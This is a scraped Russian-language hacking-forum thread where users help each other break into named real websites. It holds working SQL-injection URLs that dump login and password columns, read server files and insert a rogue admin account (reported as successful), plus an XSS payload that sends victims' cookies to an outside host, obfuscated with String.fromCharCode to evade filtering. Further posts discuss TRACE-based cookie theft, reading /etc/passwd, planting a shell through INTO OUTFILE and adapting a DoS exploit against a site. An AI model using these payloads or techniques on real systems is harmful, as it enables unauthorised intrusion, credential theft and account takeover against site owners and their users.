второй вариант это ты например на народе делаешь страничку, а в ней JS скрипт который отсылает (на стороне браузера) TRACE запрос на mail.ru (хотя на mail.ru TRACE помоему отключены, а вот на yandex.ru не отключены) а потом полученные данные на снифер например. Когда пользователь зайдет на эту твою страничку, ты получишь его куки с mail.ru. Но это не прокатит из-за доменных ограничений при посылке TRACE запроса, видел несколько примеров, как обойти эти доменные ограничения, но все эти примеры для старых версий браузеров и в современных версиях не работают, но теоретически всетаки возможно обойти эти доменные ограничения.

Но это не прокатит из-за доменных ограничений при посылке TRACE запроса, видел несколько примеров, как обойти эти доменные ограничения, но все эти примеры для старых версий браузеров и в современных версиях не работают, но теоретически всетаки возможно обойти эти доменные ограничения.

Пасиб те огромное, моя не может выразить более благодарности ))))). А прокатит, если у меня браузер,скажем,5.0,и у юзера тоже?:Р(хотя надеяться не на что),то ,по идее, сработает. Многие не понимают важность версии программного обеспечения, и обновляются ради новых функций,или ради того, что просто новая версия ))))).

Народ, что делать,если фильтруется from ? (на уровне скрипта не фильтруется, ибо комменты работают). Может знает кто, как обойти ( через пост запрос я хз как, не пробывал ) ).

почемуто мне кажется что в пост запросе или куках from не фильтруется

Велемир
Тебе не надоело спамить тему?За 3 дня 3 страницы твоих сабжей половина из которых какие то коментарии. Не пробывал объеденять свои вопросы(кнопочка едит)
По сабжу вот темы юзай поиск
_http://forum.antichat.ru/printthread.php?t=62866&pp=40
_http://forum.antichat.ru/printthread.php?t=56409

Да лан те, места жалко ?))))))))))))))

Поправлю Scipio, не только IE, на данный момент все браузеры на Gecko( FF =>2.0.0.5 ), Opera =>9.50 beta, IE =>6(path). PHP =>5.2, по умолчанию метод TRACE уставновлен в положение on(IIS/Apache), плюс все публичные примеры обхода HTTP TRACE основаны при использование ActiveX компонентов, что не поддерживается( при стандартных компонентах ) FF и Оперой, зато присутствует XMLHTTPRequest.

http://img247.imageshack.us/img247/2934/untitled2hd9.jpg

Добрый вечер,подскажите как реализовать уязвимость:

1.найден уязвимый параметр login при регистрации,
ввожу ' выдаётся следующее:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string '''.

/forums/Advising/register.asp, line 49

2.ввожу ' having 1=1-- в уязвимое поле.
Выдаётся:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'members.M_Name' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/forums/Advising/register.asp, line 49

т.е. я узнал,что имя таблицы: "members", а имя первой колонки: "M_Name"???

Что делать дальше?

узнай версию SELECT @@version
имя текущего юзверя например
select user_name();
slect user;
select system_user();
mmm... еще select DB_NAME() - имя базы

ну или апишку select host_name() ... хз )))

http://msdn2.microsoft.com/en-us/library/ms173768.aspx

а что это единственное место где тебе ошибки выдает?

to xcedz

Не катит...)

Да,единственное,вроде...

ет чтоли? http://www.amideast.org/forums/advising/register.asp?mode=doit )))))

to xcedz

да))

P.S. Еще в форме поиска такая же байда.Ток что нашел)

Знаешь,что дальше делать?

http://amideast.org/Pubs_one/products.aspx?skunumb=

ОПА.. размышляем дальше ;) а говорил тока там ошибку выдает ...

Если честно,то мои рассуждения дальше пока не идут,опыта и знаний маловато,так что прошу помочь...

http://amideast.org/Pubs_one/products.aspx?skunumb=

ОПА.. размышляем дальше ;) а говорил тока там ошибку выдает ...
ОПА..Размышления зашли в тупик.Это сообщение о пустом параметре, а не дырка в безопасности :D
А в логине ограничение на 50 символов нормальный запрос не воткнёшь

ОПА..Размышления зашли в тупик.Это сообщение о пустом параметре, а не дырка в безопасности

о каких дырках ретчь? гг к стате есть пассивная xss в поиске :(

или даже так http://milw0rm.com/exploits/3965 :(

Начали со скули, скатились к досу. :D
Блин может я туплю, но это не то ,помоему.Сдесь эксплоит непокатит

"This happens only to servers which respond a runtime error (System.Web.HttpException)"

А у нас не та ошибка
xcedz объясни

Народ, нашёл такую вот дыру на Яндексе( да лан вам, ну сканер помог()). Короче, атправляем такой запрос :

GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.yandex.ru
Cookie: yandexuid=4833131207762812;my=YwECAAMHAwEBFwgIBQYD AgQJCAEMATIOAQAVBQQBAgSnExYBABsDAAADAA%3D%3D;YX_SE ARCHPREFS=favicons:1,lang:all,ton:1,banners:1,sear ch_form:topbot,numdoc:10,target:_blank,desc:someti mes,lr:,wstat:1,t:2,family:1;;fyandex=1
Connection: Close
Expect: <script>alert('suka')</script>
Pragma: no-cache

И, походу, срабатывает ( если использывать SQL INJ TOOL > Show in Browzer). Я так и не понял, сработало это или нет, пассивная это XSS или нет (с моим-то опытом да )))) ), но я читал, что НТТР не даёт провести XSS через поле заголовка EXPECT, ибо так и было задумано ))). Там атак много конечно: CRLF, подделка куки, трейс( от которого понту нет,вы знаете ) ))).До черта ещё сканировать будет я чувствую))).Так вот пара вопросов: сработала у мя в таком случае XSS ? если да, то пассивка или активко о_О ? И ещё : зависит ли скорость сканирования только от объёма канала и его загруженности ? Буду весьма признателен за ответы, ня ^_____^

Также нашёл редиректы на произвольный юрл в некоторых скриптах, которые толком ничо не дают)))( ну кто на такое купится,да и это не ХСС, код не внедряетс, тобишь ночевать не будет на страничке ( ).

P.S. Учимся ломать мир о_О

Велемир
невидно самого пути к уязвиомому скрипту
запрос должен выглядить так

GET http://yandex.ru/ HTTP/1.0
итд..

Тык а путь же / ,тобишь index.html. В запросе нету уязвимого скрипт,мошь просто ошибка высветилась и выполнился скрипт <script>alert('suka')</script>.Эт надо делать через xmlHTTP походу...

This script is vulnerable to Cookie manipulation attacks.

By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
Affected items
/cgi-bin/banner_count.pl
/cgi-bin/customize.pl
/cgi-bin/save-setup.pl
/cy

Тож дырень непонятная.Понту от того,что я могу менять куки?:Р Сканер тупит имхо...хотя, мона мета теги менять...Вот ток как хз

2SQL~In[J]ecTi0n, ник обязывает знать, судя по ошибкам там MS Access. Тяжеловато провести инъекцию, но возможно, я делал, чего и тебе желаю...)

Народ, нашёл такую вот дыру на Яндексе( да лан вам, ну сканер помог()). Короче, атправляем такой запрос :

GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.yandex.ru
Cookie: yandexuid=4833131207762812;my=YwECAAMHAwEBFwgIBQYD AgQJCAEMATIOAQAVBQQBAgSnExYBABsDAAADAA%3D%3D;YX_SE ARCHPREFS=favicons:1,lang:all,ton:1,banners:1,sear ch_form:topbot,numdoc:10,target:_blank,desc:someti mes,lr:,wstat:1,t:2,family:1;;fyandex=1
Connection: Close
Expect: <script>alert('suka')</script>
Pragma: no-cache

И, походу, срабатывает ( если использывать SQL INJ TOOL > Show in Browzer). Я так и не понял, сработало это или нет, пассивная это XSS или нет (с моим-то опытом да )))) ), но я читал, что НТТР не даёт провести XSS через поле заголовка EXPECT, ибо так и было задумано ))). Там атак много конечно: CRLF, подделка куки, трейс( от которого понту нет,вы знаете ) ))).До черта ещё сканировать будет я чувствую))).Так вот пара вопросов: сработала у мя в таком случае XSS ? если да, то пассивка или активко о_О ? И ещё : зависит ли скорость сканирования только от объёма канала и его загруженности ? Буду весьма признателен за ответы, ня ^_____^

Также нашёл редиректы на произвольный юрл в некоторых скриптах, которые толком ничо не дают)))( ну кто на такое купится,да и это не ХСС, код не внедряетс, тобишь ночевать не будет на страничке ( ).

P.S. Учимся ломать мир о_О
Ухты! Как много ты умных слов ты знаешь. Не можешь отличить активку от пассивки, а уже xss через HTTP заголовок замутил. TRACE бесполезный? А если на сайте куки с атрибутом httpOnly? Эту пассивку можно нормально использовать (с токи зрения жертвы) только через swf или через отправку пакета через XMLHttpRequest

Велемир
невидно самого пути к уязвиомому скрипту
запрос должен выглядить так

GET http://yandex.ru/ HTTP/1.0
итд..
Необязательно.

2SQL~In[J]ecTi0n, ник обязывает знать, судя по ошибкам там MS Access. Тяжеловато провести инъекцию, но возможно, я делал, чего и тебе желаю...)
Там обычный MSSQL:
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
По-этому для дальнейшего проведения SQL~In[J]ecTi0n читайте статью кеша https://forum.antichat.ru/threadnav30501-1-10.html
там все описано в полном объеме.
А по поводу
ОПА..Размышления зашли в тупик.Это сообщение о пустом параметре, а не дырка в безопасности
А в логине ограничение на 50 символов нормальный запрос не воткнёшь
Ограничение в 50 символов обходится, например простым сохранением странички на локале и дописыванием удаленного обработчика в коде html.
Хотя мона просто воспользоваться FireFox Post Extension например или руками отправить пост...

Необязательно.
а тогда куда же запрос отправлять?

GET /index.php
Host: site.com

кто знает в *.pl страницах существуют существенные уязвимости например при которых мона файлик на комп удаленный заливать..... xss не интерисуют.... там соединение https и вдобавок ни каких cookie....

да и про VS Billing v. 1.0 rc2 (c)2003 ктонить слышал???

Знающие люди,кому не сложно помочь,стукните в 380-225-866

P.S. Статью [ cash ] 'a уже до дыр зачитал.Не могу выполнить ни одно из действий,описанных там,т.к.постоянно выдаётся ошибка "Incorrect syntax near <оператор>"

Ухты! Как много ты умных слов ты знаешь. Не можешь отличить активку от пассивки, а уже xss через HTTP заголовок замутил. TRACE бесполезный? А если на сайте куки с атрибутом httpOnly? Эту пассивку можно нормально использовать (с токи зрения жертвы) только через swf или через отправку пакета через XMLHttpRequest


Необязательно.

Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.

А что если при запросе из таблицы users по клонкам login,pass вернулось 'void:pass'
База пустая чтоли? :Р Версия бд 4.1.18

Warning: getimagesize(6): failed to open stream: No such file or directory in /www/anthost/www/htdocs/fc-anji/news.php on line 141

Query failed: Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

использовал знаменитый алгоритм шифрования AES:РРР

http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@versi on_compile_os,0x71),0x71),3,4,5,6/*

portbld-freebsd5.4


http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@based ir,0x71),0x71),3,4,5,6/*

Тут неполучилось:Р,с одним @ тоже))

Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.
иди доки лучше по читай, здесь никто никому ничего не должен объснять или показывать.
А что если при запросе из таблицы users по клонкам login,pass вернулось voidass
База пустая чтоли? :Р Версия бд 4.1.18
Если что-то вернулось значит не пусто, используй объединение concat или concat_ws с разделителем можно просто :, а можно в хексе.
concat(user,':',pass)
concat_ws(0x3a,user,pass)

http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,login, pass),3,4,5,6+from+users/*

Та же ошибка, но вернулось всё то же самое, что и при предыдущем запросе:

void: pass ))))))

Самое интересное, что если использовать лимит и подставить 0,1 , то и вернёт void: pass.Дальше не возвращает ).Мошь он нуль и возвращает?:Р Или это какой-то новый способ защиты ?))))
Да,и вот ещё что: доступа к mysql.user и information?schema.tables нету (

http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,login, pass),3,4,5,6+from+users/*

Та же ошибка, но вернулось всё то же самое, что и при предыдущем запросе:
void: pass ))))))
Самое интересное, что если использовать лимит и подставить 0,1 , то и вернёт void: pass.Дальше не возвращает ).Мошь он нуль и возвращает?:Р Или это какой-то новый способ защиты ?))))
Да,и вот ещё что: доступа к mysql.user и information?schema.tables нету (
все правильно при таком запросе у тя будет

http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3b,login, pass),3,4,5,6+from+users+limit+0,1/*

void;pass -> login: void pass: pass
0x3b -> разделитель ;
больше записей в users нету поэтому пустой рез.

доступа к mysql.user и information?schema.tables нету

Версия бд 4.1.18
Ну нет доступа это обычное дело, правильно права выставлены.

Кто-то постарался знач : ) Пасип что разъяснил:Р

information_schema присутствует с версии 5 и далее

Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.
В интернете мало доков по http? Скачай себе http intruder, там есть конструктор пакетов =\

information_schema присутствует с версии 5 и далее

Хыхы,а я и забыл ))))

http://www.prstyle.ru/index.php?id=47+union+select+1,2,3,4/*

По какой причине вылазит:
The used SELECT statements have a different number of columns
?
Использование select имеет неправильный номер в колонке, как-то так..

В интернете мало доков по http? Скачай себе http intruder, там есть конструктор пакетов =\


Мне живые примеры нуны для того, шоп убедиццо, шо я прально всё делаю. А запросы простенькие я могу составлять,и интрудер у меня есть ((((,

Ershik, там 3 колонки
http://www.prstyle.ru/index.php?id=47+order+by+4/*
http://www.prstyle.ru/index.php?id=47+order+by+3/*

Точно, три колонки и xss в поиске
Спасибо, разобрался.

Всем прива ! У меня следующая проблема, проворачиваю активную ксс, код получился таким - <body onload=img = new Image(); img.src = "http://s.netsec.ru/xxx.gif?"+document.cookie;>
Но символ / фильтруется, вернее даже не фильтруется, а все, что идет после него, обрубается, включая символ, можно ли что нибудь при таком раскладе сделать ?

Можно строку "http://s.netsec.ru/xxx.gif?" зашифровать в ASCII-коды, а потом яваскриптом расшифровывать с помощью String.fromCharCode();
Например:


String.fromCharCode(104,116,116,112,58,47, 47,115,46,110,101,116, 115,101,99,46,114,117,47, 120,120,120,46,103,105,102,63);
//это вернёт строку http://s.netsec.ru/xxx.gif?

А финальный вариант без ошибок примерно такой:

<body onload="javascript:img = new Image(); img.src = String.fromCharCode(104,116,116,112,58,47, 47,115,46,110,101,116, 115,101,99,46,114,117,47, 120,120,120,46,103,105,102,63);+document.cookie;">

пожайлусто помогите разработать sql иньекцию
http://www.prodai.user.kz/index.php?id=68296&fid=5'

"><script>alert()</script>

Вопрос: Почему при передаче символов с двойными и одинарными кавычками не срабатывает ? А с передачей чисел пашет

"><script>alert(/blablabla/)</script>

кавычки не срабатывают изза magic_quotes или чегониб типа addslashes()

пожайлусто помогите разработать sql иньекцию
http://www.prodai.user.kz/index.php?id=68296&fid=5'

Больше на раскрытие пути похоже:Р

2 ZET36
там нет sql иньекции, там только раскрытие пути.

2 Велемир
попробуй
"><script>alert(/text/)</script>

Нашёл инъекцию через POST :

POST /oplok.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.site.com
Content-Length: 66
Cookie: PHPSESSID=a0e17714683f525e29aa6268ed85bf8b;hotlog= 1
Connection: Close
Pragma: no-cache

id=%2D%31%2B%6F%72%64%65%72%2B%62%79%2B%35%30%30%3 0%30%30%30%2F%2A

Передал запрос : -1+order+by+5000( тот,что выше).При передаче вместо 5000 еденицы или нуля выдаёт ту же ошибку -

<b>Warning</b>: mysql_free_result(): supplied argument is not a valid MySQL result resource in <b>/home/wmkhark/public_html/oplok.php</b> on line <b>500</b><br />

Не может же такого быть О_О )(

Я знаю, про это где-то писали, лень мучить форум поиском:Р.

Достал я вот файл etc/passwd.Пароль там не хранится,но есь какийто пути.Так же есь фаил etc/group. Не пойму,почему не работает etc/passwd%00.txt,но работает etc/passwd%00.jpg ? Они же не в этом формате Ж).Имея только эти файлы сделать что-то можно ?).Или какие-то другие пути нужны?

Server banner Apache/2.2.3 (CentOS)
Operating system Unix
Web server Apache 2.x

Из чувствительных директорий только /forum,/forum/css и т.д,но к ним нет доступа. папок типа админ и администратор нету.Йа ф шоке. Некуда даже инфу вводить)).

Ну тык, умеет кто проводить sql inj через POST запросы ? Лично я в нете шарил - не нашёл ни одного гайда по этой теме.

Нашёл инъекцию через POST :

POST /oplok.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.site.com
Content-Length: 66
Cookie: PHPSESSID=a0e17714683f525e29aa6268ed85bf8b;hotlog= 1
Connection: Close
Pragma: no-cache

id=%2D%31%2B%6F%72%64%65%72%2B%62%79%2B%35%30%30%3 0%30%30%30%2F%2A

Передал запрос : -1+order+by+5000( тот,что выше).При передаче вместо 5000 еденицы или нуля выдаёт ту же ошибку -

<b>Warning</b>: mysql_free_result(): supplied argument is not a valid MySQL result resource in <b>/home/wmkhark/public_html/oplok.php</b> on line <b>500</b><br />

Не может же такого быть О_О )(

Я знаю, про это где-то писали, лень мучить форум поиском:Р.

Достал я вот файл etc/passwd.Пароль там не хранится,но есь какийто пути.Так же есь фаил etc/group. Не пойму,почему не работает etc/passwd%00.txt,но работает etc/passwd%00.jpg ? Они же не в этом формате Ж).Имея только эти файлы сделать что-то можно ?).Или какие-то другие пути нужны?

Server banner Apache/2.2.3 (CentOS)
Operating system Unix
Web server Apache 2.x

Из чувствительных директорий только /forum,/forum/css и т.д,но к ним нет доступа. папок типа админ и администратор нету.Йа ф шоке. Некуда даже инфу вводить))

на том же сайте news.php?id=0+union+select+1,user(),3,4,5/*

Есть таблица "user_privileges", и как можно из этой таблцы вытащить всю информацию??

Есть таблица "user_privileges", и как можно из этой таблцы вытащить всю информацию??
Посмотреть колумны в таблицеесли версия mysql 5,с помощью запроса:
http://site.ru/index.php?id=1+union+select+1,2,3,column_name,5,6, ....+from+information.schema.columns+where+table_n ame='user_privileges'
Потом обычным запросом ужевыдирать данные!
Но табла "user_privileges" ничем не интересна имхо!

Но табла "user_privileges" ничем не интересна имхо!
Интересна, если нужно выяснить наличие привилегии file_priv - для чтения и записи файлов, к примеру, прочитать /etc/passwd или залить шелл через INTO OUTFILE

Интересна, если нужно выяснить наличие привилегии file_priv - для чтения и записи файлов, к примеру, прочитать /etc/passwd или залить шелл через INTO OUTFILE
Можно просто попробывать прочитать /etc/passwd если вывод будит то ипривилегии есть,это помоемупроще чем копаться в таблице!
Хотя есть разные ситуации.. не буду спорить))

select file_priv from mysql.user. Кажеца так)


Можно просто попробывать прочитать /etc/passwd если вывод будит то ипривилегии есть,это помоемупроще чем копаться в таблице!
Хотя есть разные ситуации.. не буду спорить))

Не 100%-й вариант

з.ы. тупанул..ну мож кому-нить поможет :D не с начала читал

Да мне не именно таблицу "user_privileges" нужно прочитать, я хочузнат как ваабще их чиать над!! я просто незнаю и ещо учусь!

GOGA075, Не пойму вопроса, как читать из таблицы есть в мануалах по sql, советую прочитать, чтоб понимать что такое sql-inj в принципе, а не бездумно подставлять по шаблону.

А вообще конструкция такая:

select * from table where value

Где * - колонки из таблицы table, в которых существует value. Ну это один из вариантов..

ну как, вот знаешь ты названия http://site.ru/index.php?id=-1+union+select+1,2,name_of_column,4,5+from+users+l imit+1,1/* вот те запрос, де name_of_column название столбца типа username или id, pwd , from+users это откуда, из какой таблицы, лимит это последовательный вывод, вообще читай статью нуля

-1+union+select+1,2,3,4,5,name_of_column,7+from+cpg 130_users+limit+1,1/* нерабоает!!!

GOGA075
Вместо name_of_column нужен твой, существующий столбец, Sharingan всё тебе написал.Но и с имеющимся столбцом может не работать , всё зависит от базы,прав доступа фильтрации и т.д.Всё в статьях на форуме

А как этот столбец найти??

Goga075
Смотря какая база , запросы и методы будут разными.Если дашь ссылку , то тебе его найдут , но как ты думаешь зачем люди пишут статьи, а другие люди их читают?
Если сейчас тебе дадут готовый запрос по выводу аккаунта,завтра ты опять в этой теме будешь писать те-же вопросы.

POST /index.php?action=esearch&lang=en HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.site.com
Content-Length: 168
Cookie: PHPSESSID=065ad9c95bdbd658b23dc7305f91b803
Connection: Close
Pragma: no-cache

fname=111-222-1933email@address.tst&lname=111-222-1933email@address.tst&b_day=-1+union+select+1,2,3,4,5,6,7,8,9&b_month=none&b_year=none&city=none&field=none&grupp=none


Почему при таком POST запросе выдаётся Unknown table 'g' in order clause ?. Я ж бля не выбираю таблицы вообще. ордер бай выдаёт ошибку,груп бай при 9 выдаёт боле менее)

При order by такая ошибка :



You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY g.grupp_id, s.city, s.lname' at line 16

Де тут ошибка в синтаксисе ниипу вапще

При запросе -1+group+by+9 выдаёт нормальную страницу( знач кол-во столбцов подобрано правильно).

2велемир блин такой мастер ставить вопросы такой злой пост прям ппц не че не понятно O_o
по крайней мере из того что я тут понял :) в конец запроса добавь /* либо пробелы через
/../ или просто пробелы поставь !а в идела был бы url было бо проше ;)

иногда приходится пользоваться hex unhex чтобы получить версию бд в скуле. какие есть еще варианты шифрования? или стоит всегда пользоваться hex?
знаю еще compress,uncompress,aes_cr

bag
Это не обход шифрования
hex:unhex используют при проблемах с кодировкой.
Для этих-же целей используют ещё aes_decrypt:aes_encrypt или cast(_строка_+as+binary)
Эти функции преобразуют строку в нужную кодировку.Например
aes_encrypt шифрует строку с заданным ключом, а aes_decrypt дешифрует, на выходе получается результат в "правильной" кодировке.То-же самое делает пара hex:unhex только другим алгоритмом

теперь все ясно, спасибо)))

Так... Теперь я :)

Попросили понюхать чат, но тута такая интересная скуля что разгодать её уже самому интересно...
Есть вот такая вот штука
_http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!&action=view
пробуем
http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!'&action=view
ошибка. Пробуем
_http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!'+ORDER+BY+1/*&action=view
Катит. Пробуем
http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!'+ORDER+BY+2/*&action=view
не катит, тоесть 1 колонка... Пробуем
_http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+1/*&action=view
Грит у юзверя нет инфы, пробуем
http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+2/*&action=view
Выводит нам кого-то, тоесть это ID юзверя, значит у нас есть запрос ... WHERE ID = 2
надо WHERE ID = 2+ORDER+BY+3/* (заранее скажу что там 3 колонки)
Делаем
_http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+'2+ORDER+BY+3/*'/*&action=view
Работает, делаем UNION+SELECT+1,2,3/*
_http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+'2+UNION+SELECT+ 1,2,3/*'/*&action=view

Ошибка :confused:
Помогите разобраться

Ponchik, тут все просто, переменная nick имеет ограничение на длину (максимум 32 символа) все остальное просто обрубается и не идет в sql запрос, что и вызывает ошибку
Также скорее всего есть какая то фильтрация или даже проверка на intval описанная в статье Elekt`a правда у него там про php, но и здесь возможно тоже

помогите найти багу в www.doma.net.ua что только не пробовал все безполезно

А че их там искать ).Найди сплойт под дос на mod_ssl, переделай,если нуждается, и ебашь ).

Нашел скулю. Сначало эта сволочь ругалась на
Error executing SQL query: Illegal mix of collations (cp1251_general_cs,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'. Please contact the servers system administrator.
Хрен с ней, перевел в "convert(version() using cp1251)"

Теперь выплывает:
Error executing SQL query: Illegal mix of collations for operation 'UNION'. Please contact the servers system administrator.

Колонок 7. Хорошо. Ставлю на 6 и мне выходит:
Error executing SQL query: The used SELECT statements have a different number of columns. Please contact the servers system administrator.
Допираю, что сервер запрещает функцию UNION...Как можно закодировать?

А вот такой вопрос - при запросе -1+union+select+1,2,3,4,5/* идёт ответ Ouknown column *xxxx*.Можно без поиска таблицы вбивать названия полей, чтобы угадать ?:РР.Ну, тобишь если вбивать поле user, и, если оно есть, высветится оное ? ).

Нашел скулю. Сначало эта сволочь ругалась на

Хрен с ней, перевел в "convert(version() using cp1251)"

Теперь выплывает:


Колонок 7. Хорошо. Ставлю на 6 и мне выходит:

Допираю, что сервер запрещает функцию UNION...Как можно закодировать?

Ниче подобного, не запрещает он юньку. Я где-то видел уже такое,и... )))

Ну не знаю..там с кодировкой траблы, может из-за
этого?

Ershik
Проблемы кодировки пробуй:
UNHEX:HEX
AES_DECRYPT:AES_ENCRYPT
cast(строка+as+binary)
По идее любое подойдёт

Ну не знаю..там с кодировкой траблы, может из-за
этого?

У меня кстати аес получалось( вспомнил вроде)

aes_decrypt(aes_encrypt(любое твоё слово,0x71),0x71)

Скажите я могу читать или писать файлы на сервере MYSql 4 ветки:

http://192.168.2.100/stats/map.php?id=1+and+substring(version(),1,1)=4
выполняется

http://192.168.2.100/stats/map.php?id=1+limit+5+union+select+1,2,3,4,5,6,7,8, 9,10,11,concat(version(),"%20",database(),"%20",SESSION_USER()),13,14,15,16,17/*
как читать писать в файл зная дирикторию... но к сожелению не знаю права на папки.... и можноли тут изменять таблицу

Есть ли что то типа database() но выводящее где база находится я имею ввиду IP....


еще вот такая ситуация :
подобрал столбцы 12 столбец выводится как текст:
http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17/*


а вот это выводит без ошибок но там где выводится 12 столбец пусто....

http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6, 7,8,9,10,11,LOAD_FILE('/var/www/html/stats/includes/class_db.php'),13,14,15,16,17/*


так же заместо loadfile вставляю CASE+WHEN+(1=1)+THEN+'A'+ELSE+'B'+END работает выводит А


привожу дополнительные сведения о SQL:
версия sql 4.0.20
Имя юзера gamecs@localhost
имя базы ps_stats
как я понял из session_user то запросы выполняются под gamecs@localhost жду помощи... +++

Велемир, ты написал полную ересь, причем поправлять тебя смысла нет, т.к. ересь почти во всем твоем посте

Вообщем форум phpBB я знаю акк админа но в админку нельзя поапасть т.к. требует акк и пароль вваести(админские неподходят) можно ли как нибуть зайти в админку? или сделать дамп без входа в админку?

Rogun
Привязка по IP возможно

При запросе http://www.countryman.com/store/product.asp?id=1;+insert+into+users(UserID,Admin,U serName,Password)+values(2,1,'tratata','gangsta')--

Выдаёт ошибку:

[Microsoft][ODBC SQL Server Driver][SQL Server]Cannot insert explicit value for identity column in table 'USERS' when IDENTITY_INSERT is set to OFF

Мне страшно о_О...

IDENTITY_INSERT отключен для UserID т.е. ты не можешь вставлять туда значения вручную, пробуй без нее:
http://www.countryman.com/store/product.asp?id=1;+insert+into+users(Admin,U serName,Password)+values(1,'tratata','gangsta')--

Няяяя,пасибки:Р.Щас тоже попробывал добавить,всё получилось!) (*Пошёл прыгать с абрыва*)

http://www.countryman.com/store/product.asp?id=1;+insert+into+users(UserName,Admin ,Password)+values('Welka','1','realkilla')--

Чойто не фкурил. Ввёл 2 раза неверно, и уже типо аблом -

http://www.countryman.com/admin/

You have exceeded the maximum
allowed log in attempts.

Тобишь всё должно быть верно о_О,но не пустило

хелп
http://kharkov.nezabarom.com.ua/events/Devushki-nebav-samolet!/?page=-1

http://kharkov.nezabarom.com.ua/events/Devushki-nebav-samolet!/?page=7+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*
плин даже выводимы поля получить не могу, наверна юнион запрос скорей всего чото не выполняется, тока почему?

Велемир, это походу не от админки, или мож ты в поле Admin не те данные инзертишь
а вот здесь:_http://www.countryman.com/dealers/default.asp нормально авторизовывает

Shred, инъекция после limit при наличии order by, ничего не сделаешь

плин, жаль
ок спасибо

Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'realkilla' to a column of data type bit

тут стопудоф надо либо 0,либо 1 (

Взял в той же последовательности, отмочил другой логин и пасс и всё равно не фурычит при запросе(мошь я туплю,но вот)

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+UserName+from+ users+where+Admin=1)--

Вместо 1 ставлю другие номера ( ну перебираю типо - надеюсь хоть это правильно:Р )

Shred, инъекция после limit при наличии order by, ничего не сделаешь
Scipio
Объясни плиз, просто я смотрел, показалось ,что вообще скули нет т.е. нет возможности как то влиять на запрос

http://kharkov.nezabarom.com.ua/events/Devushki-nebav-samolet!/?page=7
ну да, можно сказать и нет инъекции, просто я не так выразился, там значение page увеличивается на единицу и умножается на 10, т.е. по идее даже запрос свой не вставишь

Возможно ли проведение инъекции в такой конструкции: /index.shtml?id=41086 ?

сканер показал что найдена папка cgi-bin и cgi-bin/formmail.pl, пробовал в браузере зайти на них пишет что таких страниц не существует, как понимать?

VentRu
Если это тот сайт о котором я думаю,то не советую :D

VentRu, думаю не стоит трогать этот сайт ;)))

jokester, опередил)))))

Вы правильно думаете. Я в принципе спрашиваю. Насколько понимаю, возможна))

2 VentRu
А почему бы и нет ? Конечно, возможно

http://hosted-forum.com/active_members.php?cat=-1+UNION+SELECT+1,version(),3/*
помогите дальше двинуться)

http://hosted-forum.com/active_members.php?cat=-1+UNION+SELECT+1,version(),3/*

где ты тут нашел sql ? :))


ща проверил,скуля есть, вчера не было :))))))
видать сервак глючил или админ....

Вчера смотрел, они с базой какие-то работы проводили.

http://www.tammiku.edu.ee/arhiv/06-07.php?month=1&year='

Ншёл сканер скулю. Сколько ни мудилсо, ниче вывести не смог ))).При запросе из баз выводит форбидден:Р. Зато запросы вида 1'+and+'2'='1&year=2008 пашут.Почему именно столько кавычек я хз.Есть подозрения, что для двойки две кавычки потому, что ид соответствует строковая переменная. Запоролся в общем йа : )(Это уже Blind sql inj).

http:/www.tammiku.edu.ee/arhiv/06-07.php?month=4'+and+'1'='0&year=2008

Шо тут гадать то:Р

http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,5,6,7/*
работает,

то на странице отображается 3 и 5

но когда хочу поставить version() то не работает ..
